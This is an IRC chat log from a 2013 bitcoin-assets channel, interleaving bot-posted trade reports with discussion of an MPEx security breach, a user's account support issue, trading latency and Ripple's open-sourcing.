22:08:02 :D Sep 25 22:08:54 lol Sep 25 22:10:02 orly Sep 25 22:10:31 the plot thickens. apparently there was a breach of some sort. Sep 25 22:10:35 investigating. Sep 25 22:10:48 hm, live.coinbr.com has it (in all its crude glory) Sep 25 22:11:19 that means it was published in RSS Sep 25 22:14:19 ah ya Sep 25 22:15:53 hm Sep 25 22:16:07 so theres a breach, shares get sold and some dude asks how long the withdrawal takes... http://log.bitcoin-assets.com/#331320 Sep 25 22:16:16 yea Sep 25 22:16:17 :> Sep 25 22:17:26 Woah. I believe I was the only to ask that question Sep 25 22:17:33 But I am nothing to do with said breach.. Sep 25 22:26:23 heh. Sep 25 22:27:35 [BTCTC] [LABCOIN] 5900 @ 0.00125017 = 7.376 BTC [-] {2} Sep 25 22:27:55 fyi, CoinBr accounts are intact. Sep 25 22:33:13 what breech? Sep 25 22:34:31 breach Sep 25 22:40:48 [MPEX] [S.MPOE] 3000 @ 0.00078655 = 2.3597 BTC [-] Sep 25 22:48:57 f yeah Sep 25 22:49:01 wrong window Sep 25 22:58:20 mkay. too soon to say for certain, but it seems a bunch of fake trades were reported. im putting a two hour hold on trades of s.mpoe and s.bbet. Sep 25 23:05:14 huh? Sep 25 23:15:52 jnh,jhuflhasdlkfdslafjlksksdaf Sep 25 23:15:54 okay cool Sep 25 23:15:56 it works Sep 25 23:16:11 mircea_popescu is romania in the EU? Sep 25 23:17:31 yes. Sep 25 23:17:32 he's probably doin stuff. ya it is: http://en.wikipedia.org/wiki/European_Union Sep 25 23:17:36 oh :) Sep 25 23:17:38 From 2015, Romania will host Europe's first NATO anti-missile shield. Sep 25 23:17:39 and yes i am doing stuff. Sep 25 23:17:59 sounds like MPEx will never get nuked. Sep 25 23:21:27 [HAVELOCK] [AM1] 1 @ 1.5 BTC [-] Sep 25 23:24:24 thestringpuller:afaik the servers are in america, not in romania Sep 25 23:26:32 [BTCTC] [BTC-TRADING-PT] 30 @ 0.025084 = 0.7525 BTC [-] {3} Sep 25 23:27:33 [BTCTC] [ASICMINER-PT] 10 @ 1.49649999 = 14.965 BTC [+] {4} Sep 25 23:28:27 anyway, fact #1 : attacker failed to obtain any btc for his trouble. he did try to, but it was caught. Sep 25 23:28:57 *getspopcorn* Sep 25 23:28:58 i'll be making a post later about it. Sep 25 23:29:12 can you be charged with stealing btc? Sep 25 23:29:35 [BTCTC] [ASICMINER-PT] 1 @ 1.497 BTC [+] Sep 25 23:29:35 [BTCTC] [FN] [BTC-GROWTH] 40 @ 0.07501 = 3.0004 BTC [-] Sep 25 23:29:40 well these things are reported to the fbi as a matter of course, but i don't know if they ever do anything. Sep 25 23:30:42 by you? Sep 25 23:31:29 by the person in charge of that. Sep 25 23:31:37 [BTCTC] [LABCOIN] 1000 @ 0.00125 = 1.25 BTC [-] Sep 25 23:36:42 [MPEX] [S.MPOE] 6650 @ 0.00078511 = 5.221 BTC [-] Sep 25 23:38:09 mircea_popescu: so it's trading now? won't be any reverts? Sep 25 23:38:37 there will def be reverts. Sep 25 23:39:57 i didn't do it Sep 25 23:40:07 lol Sep 25 23:42:26 Is burnside quick about support? 2btc is missing from my account Sep 25 23:42:57 yes today he was quick on btctalk, maybe still is on Sep 25 23:43:09 k Sep 25 23:44:50 [BTCTC] [ASICMINER-PT] 1 @ 1.454 BTC [-] Sep 25 23:45:12 well that's odd, it set a different permanant withdrawl address Sep 25 23:49:37 2fa enabled? Sep 25 23:50:31 Yeah Sep 25 23:50:54 shows a balance of 1.9995 on the top of my screen, but in my wallet it shows 0 ballance Sep 25 23:51:28 that's odd. was the missing amount withdrawaled? Sep 25 23:52:35 please go to "wallet" - "withdrawal history" and check Sep 25 23:56:01 [BTCTC] [LABCOIN] 1066 @ 0.001299 = 1.3847 BTC [+] Sep 25 23:58:36 i'm very interested to hear more about this breach Sep 25 23:59:04 [BTCTC] [FN] [BTC-GROWTH] 40 @ 0.07501 = 3.0004 BTC [-] Sep 25 23:59:04 [HAVELOCK] [CBTC] 7600 @ 0.00035119 = 2.669 BTC [-] {2} Sep 25 23:59:55 the20year1: also click on "refresh" right to your account balance in your wallet Sep 26 00:00:05 [HAVELOCK] [AM1] [PAID] 12.62738295 BTC to 1`435 shares, 879957 satoshi per share Sep 26 00:01:06 [HAVELOCK] [AM100] [PAID] 20.96361960 BTC to 250`761 shares, 8360 satoshi per share Sep 26 00:05:31 looks like https://bitcoin-central.net/ is back for real Sep 26 00:06:11 [HAVELOCK] [B] [XBOND] 158 @ 0.00119999 = 0.1896 BTC [+] Sep 26 00:06:48 another website that uses highcharts.com >.< Sep 26 00:07:12 [HAVELOCK] [AM100] 8 @ 0.0157 = 0.1256 BTC [-] {2} Sep 26 00:07:13 [HAVELOCK] [NEOBEE] 887 @ 0.00299999 = 2.661 BTC [+] Sep 26 00:07:21 Refreshing didn't do anything Sep 26 00:07:37 so was it withdrawaled and shown under "withdrawal history"? Sep 26 00:08:07 Nope Sep 26 00:08:15 Deposit history - 5 btc Sep 26 00:08:25 Withdrawl history - 3btc (My limit) Sep 26 00:08:47 No shares purchased, no other activity, top of screen shows a balance of 1.9995btc, yet wallet shows balance of 0btc Sep 26 00:09:06 did you initiate a manual payout? Sep 26 00:09:14 Not recently Sep 26 00:09:14 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [+] Sep 26 00:09:17 because you mentioned "3 btc (my limit)" Sep 26 00:09:43 that was the max i could withdrawl a few motnhs ago, and I was able to do it Sep 26 00:09:49 i see Sep 26 00:10:16 well all purchased shares and options should be visible at "withdrawal history" anway Sep 26 00:10:51 there's nothing there outside of the withdrawl of 3btc to one of my other wallets Sep 26 00:11:17 nothing? for me it shows trades that i made Sep 26 00:13:38 I never made any trades Sep 26 00:14:19 [HAVELOCK] [B] [XBOND] 90 @ 0.00120571 = 0.1085 BTC [+] {3} Sep 26 00:14:19 can you make a screenshot of this page? Sep 26 00:15:20 [HAVELOCK] [NEOBEE] 113 @ 0.003 = 0.339 BTC [+] Sep 26 00:17:46 how much of the neobee sold Sep 26 00:22:26 [HAVELOCK] [B] [XBOND] 185 @ 0.00121 = 0.2239 BTC [+] {2} Sep 26 00:22:28 [HAVELOCK] [NEOBEE] 306 @ 0.00290002 = 0.8874 BTC [-] Sep 26 00:24:28 [BTCTC] [BASIC-MINING] 6 @ 0.074 = 0.444 BTC [-] Sep 26 00:35:39 https://dl.dropboxusercontent.com/u/9427554/screenshotbtc.jpg Sep 26 00:36:33 ah i got it Sep 26 00:36:43 you need to set your public withdrawal address Sep 26 00:36:52 this step is necessary to do _anything on btct now Sep 26 00:37:20 this address would be used to identify you as shareholder after btct has been shut dowwn Sep 26 00:37:49 you can set the public withdrawal address under "account" - "settings" Sep 26 00:41:24 thx Sep 26 00:42:59 np Sep 26 00:43:18 lol b-c has 2.4 btc altogether in order book Sep 26 00:43:51 liquid market heh Sep 26 00:44:22 hm.. https://www.kraken.com/ also only .25 btc Sep 26 00:44:23 and the fucking EU-only list... keeps me out Sep 26 00:44:24 that's a shame Sep 26 00:44:45 even older customers like me aren't verified anymore Sep 26 00:45:01 so… it will have to wait Sep 26 00:46:28 dexx7: we can help you by doing something like https://coinbr.com/btct/idiff_1 Sep 26 00:46:53 re ciphermine, you mean? Sep 26 00:47:19 yes, if you need any information from shareholders , it's simple form where they authenticate using btc signature Sep 26 00:48:01 thanks, i'll forward this. support@coinbr.com is the best way to contact you? Sep 26 00:48:05 yes Sep 26 00:50:55 [HAVELOCK] [B] [XBOND] 105 @ 0.001188 = 0.1247 BTC [-] Sep 26 00:55:13 jurov: how would that work? i guess ciphermine would need to transfer their shares on bitfunder to one of your accounts and users/shareholders would need to sign a message on coinbr to claim their shares and you'd then use the internal transfer on bitfunder to distribute the shares? Sep 26 00:55:37 no, it's just to help you with collection of data Sep 26 00:56:05 you will csv who will want to transfer where to bitfunder Sep 26 00:56:13 aah, i see Sep 26 00:56:36 and you will know all the users authenticated themselvas properly Sep 26 00:56:47 so i guess - in theory - you could offer the same service for havelock, too? Sep 26 00:57:18 yes... the form fields can be changed no problem Sep 26 00:58:43 that's what i assumed. Sep 26 01:11:35 jurov: k, i sent kate (issuer of ciphermine) an email. thanks for your offer. :) Sep 26 01:11:58 you tested it? i got some bogus request :) Sep 26 01:12:05 hehe yes Sep 26 01:12:15 [BTCTC] [FN] [DMS.SELLING] 36 @ 0.00624325 = 0.2248 BTC [+] {2} Sep 26 01:12:19 it's the one with @test.com Sep 26 01:15:18 [HAVELOCK] [AM100] 8 @ 0.0157 = 0.1256 BTC [-] Sep 26 01:16:19 [BTCTC] [FN] [DMS.SELLING] 50 @ 0.006006 = 0.3003 BTC [-] Sep 26 01:17:01 it's so cool what you can do with those "mechanics". i was surprised how mpex uses gpg signed messages to proceed orders and i played a bit to create a btc signature based login system. i bet this is not new, but still impressive :) Sep 26 01:22:08 and how burnside "discovered" it once he got into trouble :) Sep 26 01:22:47 If you don't like to party then yo' ass got to go Sep 26 01:22:57 hehe yea Sep 26 01:23:19 sadly it is not widely used. i reused some code from electrum and found out it did not suppport signing messages longer than 252 chars Sep 26 01:23:30 and it was fixes only month ago in upstream Sep 26 01:23:46 dexX7 actually, it is new yeah. Sep 26 01:24:14 really? i digged a bit and found stuff like gpgauth.org for example Sep 26 01:25:21 but anyway, even more impressive then Sep 26 01:27:01 i guess it isn't quite as new as i thought :) Sep 26 01:38:41 [BTCTC] [LABCOIN] 1000 @ 0.00121069 = 1.2107 BTC [-] {8} Sep 26 01:48:51 [HAVELOCK] [SDSTM] 100 @ 0.00256 = 0.256 BTC [+] Sep 26 01:49:52 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18 BTC [-] Sep 26 02:01:03 [BTCTC] [LABCOIN] 1899 @ 0.00118099 = 2.2427 BTC [-] {8} Sep 26 02:02:04 [BTCTC] [ACTIVEMINING] 3881 @ 0.00140788 = 5.464 BTC [-] {2} Sep 26 02:27:29 [BTCTC] [LABCOIN] 426 @ 0.00126415 = 0.5385 BTC [-] {2} Sep 26 02:30:31 [BTCTC] [LABCOIN] 400 @ 0.001214 = 0.4856 BTC [-] Sep 26 02:36:37 [BTCTC] [LABCOIN] 640 @ 0.00119 = 0.7616 BTC [-] {2} Sep 26 02:37:38 [BTCTC] [LABCOIN] 320 @ 0.0011902 = 0.3809 BTC [+] {2} Sep 26 02:38:11 <[\\\]> what prevents bitfunder from going the way ot btctc? Sep 26 02:38:22 [\\\]: nothing Sep 26 02:39:27 mircea_popescu: any updates soon? Sep 26 02:39:58 jurov penning it right now. should be half hour. Sep 26 02:47:48 [BTCTC] [DMS.MINING] 328 @ 0.00109143 = 0.358 BTC [-] {6} Sep 26 02:56:15 [\\\]: we shall see Sep 26 02:57:58 [BTCTC] [BITVPS] 311 @ 0.00152057 = 0.4729 BTC [+] {6} Sep 26 03:00:12 <[\\\]> Ukyo: I ask because I thought bf was a belize corp too, no? Sep 26 03:02:42 No. Sep 26 03:02:54 And I do not believe the corporation location has anything to do with BTCT Sep 26 03:02:59 and its closings Sep 26 03:03:10 <[\\\]> oh, fair enough Sep 26 03:03:19 one unique thing about bf is it is attempting to be legal, most others seem to ignore that bit Sep 26 03:03:44 <[\\\]> well, supposedly glbse was too at one point Sep 26 03:08:36 Ukyo: do you have any time frame with this? it seems you are waiting with api for something Sep 26 03:09:54 I have been in contact with government ministers who are intersted in meeting in person Sep 26 03:11:52 so these meetings did not eve take place yet? Sep 26 03:11:56 *even Sep 26 03:12:34 real worl moves at real world speed, unlike bitcoin that lives in accelerated time Sep 26 03:13:27 <[\\\]> aye Sep 26 03:13:30 i know, i'm doing similar research... but here at least it looks close to some conclusion Sep 26 03:15:15 [BTCTC] [ASICMINER-PT] 5 @ 1.4978 = 7.489 BTC [+] {2} Sep 26 03:17:26 :) Sep 26 03:19:24 http://trilema.com/2013/mpex-security-breach/ Sep 26 03:19:28 MPEx security breach pe Trilema - Un blog de Mircea Popescu. Sep 26 03:20:20 [HAVELOCK] [AM100] 20 @ 0.01569 = 0.3138 BTC [-] Sep 26 03:21:22 ouch, sucks. good luck with that Sep 26 03:27:28 [HAVELOCK] [AM100] 10 @ 0.01569 = 0.1569 BTC [-] Sep 26 03:34:35 [BTCTC] [ASICMINER-PT] 1 @ 1.497 BTC [-] Sep 26 03:42:13 mircea_popescu: thanks for the update. Sep 26 03:47:27 mod6 yeah. Sep 26 03:49:55 !jd Sep 26 03:49:55 yes, thanks...with more details than i expected Sep 26 03:49:56 Just-Dice stat: -2153 BTC profit, 32.8k BTC invested, 139.58 mio bets, 2.01 mio BTC wagered Sep 26 03:50:51 jurov : let me point out that your brilliant idea with the tracking made my life a lot easier at this juncture. Sep 26 03:51:29 good Sep 26 03:51:54 been kinda fun to follow jd and drama Sep 26 03:52:52 o hey nice. is that new ? Sep 26 03:53:01 right out the oven. Sep 26 03:53:38 <[\\\]> ding! Sep 26 03:53:46 139.58 mio bets < that's 30 days or what? Sep 26 03:54:06 afaik its all Sep 26 03:54:37 {"bets":139582694,"wagered":201243839608995,"invested":3278856214891,"profit":-216145796359} Sep 26 03:54:48 !jd Sep 26 03:54:49 Just-Dice stat: -2163 BTC profit, 32.8k BTC invested, 139.58 mio bets, 2.01 mio BTC wagered Sep 26 03:55:40 <[\\\]> hot damn Sep 26 03:55:43 http://qz.com/128442/once-again-the-winklevoss-twins-get-beaten-to-launching-their-big-idea-a-bitcoin-trust/ Sep 26 03:55:44 dunno seems about right Sep 26 03:55:44 uh Sep 26 03:55:45 <[\\\]> losing money by the minute Sep 26 03:55:46 Once again the Winklevoss twins get beaten to launching their big idea: a bitcoin trust – Quartz Sep 26 03:55:48 didnt they ALREADY launch it? Sep 26 03:56:00 <[\\\]> probably talked about it Sep 26 03:56:03 <[\\\]> and then someone else did it Sep 26 03:56:06 <[\\\]> sorta like facebook Sep 26 03:56:42 satoshi nakamoto stole the bitcoin idea off winkletoss twins Sep 26 03:57:11 <[\\\]> the winklevoss twins ARE satoshi Sep 26 03:58:10 [\\\] they filed, but it went nowhere. as predicted. Sep 26 03:58:15 whats the plural of satoshi Sep 26 03:58:17 satoshii? Sep 26 03:58:30 <[\\\]> no Sep 26 03:58:39 <[\\\]> satoshun Sep 26 04:01:29 satoshes Sep 26 04:01:29 twinklevosi Sep 26 04:01:29 actually Sep 26 04:01:29 I bet the plural is Sep 26 04:01:29 satoshi Sep 26 04:01:29 singular plural Sep 26 04:01:29 oh the horror "One bitcoin day trader told Quartz he has to trade through a Japanese bank and show up in person at the bank’s New York headquarters to move his money to a US bank account." Sep 26 04:01:29 its a substitute for the real thing for americans Sep 26 04:01:29 let em have it Sep 26 04:01:29 suckas. Sep 26 04:01:29 <[\\\]> its all fun and games until you're labelled an axis of evil Sep 26 04:16:41 kick ass..some oriental guy in China grew a second nose on his forehead..neat. Sep 26 04:17:18 if i would grow something it'd be a second pecker..the chicks would dig it. Sep 26 04:21:34 on his forehead? Sep 26 04:21:57 we could call him droopy unicorn Sep 26 04:34:01 [BTCTC] [LABCOIN] 6000 @ 0.00117139 = 7.0283 BTC [-] {8} Sep 26 04:39:06 [BTCTC] [ASICMINER-PT] 10 @ 1.4994 = 14.994 BTC [+] {4} Sep 26 04:40:06 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [-] Sep 26 04:41:07 [BTCTC] [ASICMINER-PT] 3 @ 1.49966666 = 4.499 BTC [+] {2} Sep 26 04:42:08 [HAVELOCK] [AM100] 22 @ 0.01510909 = 0.3324 BTC [-] {2} Sep 26 04:43:09 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [+] Sep 26 04:54:20 [BTCTC] [ASICMINER-PT] 2 @ 1.463 = 2.926 BTC [-] Sep 26 04:55:21 [BTCTC] [ASICMINER-PT] 4 @ 1.463 = 5.852 BTC [-] {2} Sep 26 04:58:24 [BTCTC] [DMS.MINING] 12057 @ 0.00121283 = 14.6231 BTC [+] {7} Sep 26 05:01:49 i have an extra steam key for March of the Eagles, free to anyone that will actually play it Sep 26 05:02:04 pic: http://www.usatoday.com/story/news/nation/2013/09/25/china-transplant-nose-forehead/2871369/ Sep 26 05:03:30 not bad. Sep 26 05:06:32 [BTCTC] [LABCOIN] 800 @ 0.0011688 = 0.935 BTC [-] {2} Sep 26 05:10:36 [HAVELOCK] [CBTC] 795 @ 0.00037998 = 0.3021 BTC [+] {2} Sep 26 05:14:03 mp, i made a gybe about the condition of the ropework on your rented dhow in the bore-ums. this was before I learned of your security breach. sorry Sep 26 05:15:36 lol so what's the big deal Sep 26 05:15:41 [BTCTC] [ASICMINER-PT] 1 @ 1.47 BTC [+] Sep 26 05:16:42 [BTCTC] [BASIC-MINING] 5 @ 0.074 = 0.37 BTC [-] Sep 26 05:20:47 [BTCTC] [LABCOIN] 100 @ 0.001173 = 0.1173 BTC [+] Sep 26 05:23:50 [BTCTC] [FN] [DMS.SELLING] 150 @ 0.00679433 = 1.0191 BTC [+] {3} Sep 26 05:24:28 there was no snide double meaning, the ropework on that boat is fucked. Sep 26 05:24:44 hehe k. Sep 26 05:24:50 [BTCTC] [DMS.MINING] 150 @ 0.001348 = 0.2022 BTC [+] Sep 26 05:29:56 [BTCTC] [FN] [DMS.SELLING] 1000 @ 0.0064002 = 6.4002 BTC [-] {2} Sep 26 05:30:57 [BTCTC] [ASICMINER-PT] 1 @ 1.499 BTC [+] Sep 26 05:35:01 [HAVELOCK] [B] [XBOND] 115 @ 0.001188 = 0.1366 BTC [+] Sep 26 05:40:06 [HAVELOCK] [AM100] 15 @ 0.01568998 = 0.2353 BTC [-] {2} Sep 26 05:41:33 dexX7 https://bitcointalk.org/index.php?topic=271711.msg3233064#msg3233064 lol Sep 26 05:43:26 :D Sep 26 05:43:31 https://www.youtube.com/watch?v=gx4jn77VKlQ lmao Sep 26 05:43:34 Cartman Respect My Authoritah - South Park - YouTube Sep 26 05:44:09 [HAVELOCK] [CBTC] 305 @ 0.00037998 = 0.1159 BTC [-] Sep 26 06:01:11 Last Wednesday, the Fed announced that it would not be tapering its bond buying program. This news was released at precisely 2 pm in Washington “as measured by the national atomic clock.” It takes 7 milliseconds for this information to get to Chicago. However, several huge orders that were based on the Fed’s decision were placed on Chicago exchanges 2-3 milliseconds after 2 pm. How did this happen ? Sep 26 06:01:57 mhm Sep 26 06:02:02 happens all the time Sep 26 06:02:27 [BTCTC] [BASIC-MINING] 6 @ 0.0753 = 0.4518 BTC [+] Sep 26 06:05:50 are the chicago exchanges measured with the same clock? Sep 26 06:08:57 <[\\\]> yes Sep 26 06:09:01 <[\\\]> usually it takes 7ms Sep 26 06:09:13 <[\\\]> they executed in 2ms Sep 26 06:09:23 <[\\\]> which means someone had the know and scheduled it ahead of the release Sep 26 06:10:35 [BTCTC] [FN] [BTC-GROWTH] 77 @ 0.07501 = 5.7758 BTC [-] Sep 26 06:11:57 usually it takes a bot 7ms to act on the info? Sep 26 06:12:21 i'm wondering.. how does it work anyway? do news agencies push news and trading systems use text analysis tools to extract information to trigger a trading decision? Sep 26 06:12:56 7 ms equals the time the information needs to propagate Sep 26 06:13:14 = to transfer Sep 26 06:15:22 private fibre Sep 26 06:16:12 Vexual speed of light is an absolute cap Sep 26 06:17:00 shall we do the sums? Sep 26 06:17:50 is this a riddle? Sep 26 06:18:55 Washington is in the eastern time zone and chicago is central time zone..it took one hour + 2ms for the trade to execute Sep 26 06:18:58 ;;calc 957550/299792458 Sep 26 06:18:58 0.00319404299357 Sep 26 06:19:27 heh Sep 26 06:19:41 air line, speed of light Sep 26 06:19:44 [HAVELOCK] [DEALCO] 68 @ 0.0041 = 0.2788 BTC [-] Sep 26 06:23:44 wait.. Sep 26 06:24:48 its inside info Sep 26 06:24:56 is what it is Sep 26 06:25:21 and it happens all teh time Sep 26 06:25:30 nah, just a lucky trader Sep 26 06:26:35 what would it mean to make those trades before the announcement, knowing that was the time of the announcemnt? Sep 26 06:27:30 truffles: i wasn't serious :) Sep 26 06:39:46 It could be "Yeah we've got private fibre, but think hard before point your bots at us" Sep 26 06:43:07 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [-] Sep 26 07:10:34 [BTCTC] [LABCOIN] 2000 @ 0.00116782 = 2.3356 BTC [-] {2} Sep 26 07:21:44 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [+] Sep 26 07:22:45 [HAVELOCK] [B] [XBOND] 400 @ 0.00121 = 0.484 BTC [+] Sep 26 07:29:52 [BTCTC] [ASICMINER-PT] 6 @ 1.5 = 9 BTC [+] {2} Sep 26 07:39:49 ;;seen mircea_popescu Sep 26 07:39:49 mircea_popescu was last seen in #bitcoin-assets 1 hour, 23 minutes, and 37 seconds ago: Vexual speed of light is an absolute cap Sep 26 07:40:28 mircea_popescu: u got breechzord! only soln is distributed asschanges! Sep 26 07:42:23 lol Sep 26 07:44:59 he tried to hack mpex but realised noone was using it Sep 26 07:47:00 word. Sep 26 07:50:12 [HAVELOCK] [B] [XBOND] 96 @ 0.00121 = 0.1162 BTC [+] {2} Sep 26 08:11:33 [BTCTC] [ASICMINER-PT] 1 @ 1.501 BTC [+] Sep 26 08:11:34 [BTCTC] [BASIC-MINING] 50 @ 0.07358918 = 3.6795 BTC [-] {6} Sep 26 08:12:34 [BTCTC] [ASICMINER-PT] 6 @ 1.5 = 9 BTC [-] Sep 26 08:16:49 america Sep 26 08:16:53 where we give children ipads Sep 26 08:17:10 and then put silly, ineffectual locks on it Sep 26 08:17:34 http://www.foxnews.com/us/2013/09/25/program-halted-after-la-students-breach-school-ipads-security-in-week/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+foxnews%2Fnational+%28Internal+-+US+Latest+-+Text%29 Sep 26 08:17:35 Program halted after LA students breach school iPads' security in a week | Fox News Sep 26 08:17:44 "breach" "security" Sep 26 08:20:41 lol Sep 26 08:21:14 2626 Sep 26 08:21:18 131464895 Sep 26 08:21:44 [BTCTC] [COGNITIVE] 26 @ 0.15460383 = 4.0197 BTC [-] {6} Sep 26 08:26:44 TerraHash is dissolving Sep 26 08:39:01 [BTCTC] [FN] [BTC-GROWTH] 362 @ 0.07501 = 27.1536 BTC [-] Sep 26 08:40:02 [BTCTC] [FN] [COG.F2] 1 @ 3 BTC [+] Sep 26 08:40:02 [BTCTC] [FN] [BTC-GROWTH] 38 @ 0.075 = 2.85 BTC [-] Sep 26 08:40:03 [BTCTC] [CRYPTO-TRADE] 6 @ 0.18 = 1.08 BTC [-] {2} Sep 26 08:52:45 http://upload.wikimedia.org/wikipedia/commons/4/43/Who_needs_a_virtual_world%3F.jpg Sep 26 08:52:55 the cruelty of including flavoured lubricated condoms with that... Sep 26 08:53:05 what, for the guy's finger ? Sep 26 08:57:19 [BTCTC] [DMS.MINING] 710 @ 0.0013 = 0.923 BTC [+] {2} Sep 26 09:01:23 [BTCTC] [LABCOIN] 10602 @ 0.00116781 = 12.3811 BTC [-] {7} **** BEGIN LOGGING AT Thu Sep 26 17:07:55 2013 Sep 26 17:17:36 [BTCTC] [LABCOIN] 2651 @ 0.00098606 = 2.614 BTC [-] {2} Sep 26 17:22:41 [BTCTC] [FIMB] 39 @ 0.06947564 = 2.7095 BTC [+] {3} Sep 26 17:22:42 [BTCTC] [ACTIVEMINING] 250 @ 0.001492 = 0.373 BTC [-] Sep 26 17:26:18 How is havelock volume compared to bitfunder? Sep 26 17:27:46 [BTCTC] [ACTIVEMINING] 1466 @ 0.00154189 = 2.2604 BTC [+] {10} Sep 26 17:28:24 lower, but I think it's going to change a lot Sep 26 17:28:59 I was sort of looking at co-listing on another exchange outside of BF , and was gonna go the BTCT route, but that's no longer an option Sep 26 17:33:51 [HAVELOCK] [CBTC] 318 @ 0.0003344 = 0.1063 BTC [-] Sep 26 17:34:53 [BTCTC] [BASIC-MINING] 4 @ 0.07329 = 0.2932 BTC [+] Sep 26 17:34:53 [HAVELOCK] [AM100] 100 @ 0.01421769 = 1.4218 BTC [-] {13} Sep 26 17:37:55 [HAVELOCK] [AM100] 67 @ 0.0141 = 0.9447 BTC [-] Sep 26 17:38:56 [BTCTC] [ACTIVEMINING] 330 @ 0.001563 = 0.5158 BTC [+] Sep 26 17:39:57 [BTCTC] [LABCOIN] 300 @ 0.00099766 = 0.2993 BTC [-] {2} Sep 26 17:39:57 [HAVELOCK] [AM100] 33 @ 0.0141 = 0.4653 BTC [-] Sep 26 17:39:58 [BTCTC] [ACTIVEMINING] 425 @ 0.00157255 = 0.6683 BTC [+] {3} Sep 26 17:40:58 [BTCTC] [ACTIVEMINING] 71 @ 0.001573 = 0.1117 BTC [+] Sep 26 17:42:39 ;;bc,stats Sep 26 17:42:42 Current Blocks: 260243 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 1836 blocks | Next Difficulty In About: 1 week, 3 days, 8 hours, 56 minutes, and 56 seconds | Next Difficulty Estimate: 182322690.847 | Estimated Percent Change: 22.51288 Sep 26 17:43:00 [BTCTC] [BITVPS] 3551 @ 0.00142054 = 5.0443 BTC [-] {3} Sep 26 17:43:00 [HAVELOCK] [AM100] 25 @ 0.0141 = 0.3525 BTC [-] Sep 26 17:43:01 [BTCTC] [ACTIVEMINING] 1500 @ 0.00157333 = 2.36 BTC [+] {2} Sep 26 17:44:01 [BTCTC] [ACTIVEMINING] 584 @ 0.00156152 = 0.9119 BTC [-] {3} Sep 26 17:46:03 [HAVELOCK] [AM100] 78 @ 0.0141 = 1.0998 BTC [-] Sep 26 17:47:04 [BTCTC] [ACTIVEMINING] 769 @ 0.00155354 = 1.1947 BTC [-] {3} Sep 26 17:47:05 [BTCTC] [ASICMINER-PT] 1 @ 1.541 BTC [+] Sep 26 17:48:05 [BTCTC] [BMF] 1500 @ 0.0161 = 24.15 BTC [-] Sep 26 17:53:13 is the private bet stuff new? Sep 26 17:53:31 its been on for a day or two Sep 26 17:54:15 it's a good idea, expensive but I get why Sep 26 17:54:28 how is it expensive? Sep 26 17:54:35 "YOU SHOULD TAKE A SIDE WITH MIN 5 BTC BET" Sep 26 17:54:59 that costs you 0.05 Sep 26 17:55:54 it means I can't bet 0.1 BTC with a friend. which is normal, because it would cost too much for bitbet to resolve Sep 26 17:56:11 ah well yea Sep 26 17:56:13 [BTCTC] [LABCOIN] 588 @ 0.00099666 = 0.586 BTC [-] {2} Sep 26 17:59:23 https://bitcointalk.org/index.php?topic=301635.0;topicseen Sep 26 17:59:30 [ANN] Ripple is officially open-source w/link Sep 26 18:00:42 > misterbigg > I think we're going to see a lot of old posts and websites getting updated with retractions regarding "Ripple is not open source" now. Especially since they are liable for slander (libel?) otherwise. Sep 26 18:00:46 LMAFOAO Sep 26 18:00:56 "But that's the whole point of open-sourcing: It's one thing we can do to help keep us honest. I believe as long as we continue to live up to our promises, work hard and provide value to users, they will continue to use our network." I must agree Sep 26 18:01:29 "As far as the original network is concerned we will continue to recommend our own validators for the time being" eh… Sep 26 18:02:21 lmao Sep 26 18:02:47 somehow people think it's going to make XRP more valuable. it should be the exact contrary, especially after the first fork happens Sep 26 18:03:20 [BTCTC] [LABCOIN] 500 @ 0.000999 = 0.4995 BTC [+] Sep 26 18:03:30 go ripples Sep 26 18:04:18 yeah ideally i'd like to see someone fork that shit thus taking out of the pie idiots like coinscam, inc or w/e it's called. Sep 26 18:04:31 hell, i might even look into it if it were maintained by someone reputable. Sep 26 18:04:32 RippleLabs now! Sep 26 18:05:02 the idea is interesting. the security has to be looked into first Sep 26 18:05:18 just change their PoS to sha256 PoW and merge it Sep 26 18:05:22 [BTCTC] [LABCOIN] 1000 @ 0.000999 = 0.999 BTC [+] Sep 26 18:05:39 pankkake yes kakobrekla yes. Sep 26 18:05:53 somebody's gotta do it tho. preferably somebody with a clue, and who isn't a "ceo". Sep 26 18:06:15 and you need maybe like one big exchange adopting it to kill Ripple Sep 26 18:06:16 ripple is shit Sep 26 18:06:23 [BTCTC] [ESECURITYSABTC] 3 @ 0.07214 = 0.2164 BTC [+] Sep 26 18:06:27 :D Sep 26 18:07:24 [BTCTC] [ESECURITYSABTC] 47 @ 0.04915041 = 2.3101 BTC [-] {8} Sep 26 18:07:25 [BTCTC] [LABCOIN] 2000 @ 0.000999 = 1.998 BTC [+] Sep 26 18:07:25 [BTCTC] [ASICMINER-PT] 1 @ 1.52 BTC [-] Sep 26 18:07:25 [HAVELOCK] [B] [XBOND] 230 @ 0.00121 = 0.2783 BTC [+] Sep 26 18:08:25 [BTCTC] [LABCOIN] 249 @ 0.000999 = 0.2488 BTC [+] Sep 26 18:08:35 Scrat im not sure the protocol couldn't be salvaged into something useful Sep 26 18:08:38 you see something i don't ? Sep 26 18:10:22 i meant the current incarnation, not the old ripple Sep 26 18:10:59 it started Sep 26 18:11:00 https://bitcointalk.org/index.php?topic=301833.0 Sep 26 18:11:05 [ANN] The First Official Ripple Fork Development - NetPay (Join the development) Sep 26 18:11:29 ripple is finished! Sep 26 18:13:01 We will need: Sep 26 18:13:01 - Developers Sep 26 18:13:01 - Logo designs Sep 26 18:13:01 - Promoters Sep 26 18:13:07 lol Sep 26 18:13:17 some forum dork with 0 cred "starting" a project which other people may actually work on doesn't count. Sep 26 18:13:22 i mean someone, rather than nobody. Sep 26 18:13:29 I love how logo design is a thing as important as developers Sep 26 18:13:30 [BTCTC] [LABCOIN] 3000 @ 0.00102973 = 3.0892 BTC [+] {2} Sep 26 18:13:43 https://bitcointalk.org/index.php?PHPSESSID=t01g683j9jtq8hho25kf7oul65&topic=301833.msg3239442#msg3239442 Sep 26 18:13:44 lol Sep 26 18:13:46 [ANN] The First Official Ripple Fork Development - NetPay (Join the development) Sep 26 18:14:00 pankkake this is how retards think. Sep 26 18:14:12 this is how altcoins work though Sep 26 18:14:19 logo + name is everything Sep 26 18:14:27 they want to make a new car, they put out the orders by part weight. thus rearview mirror looking like 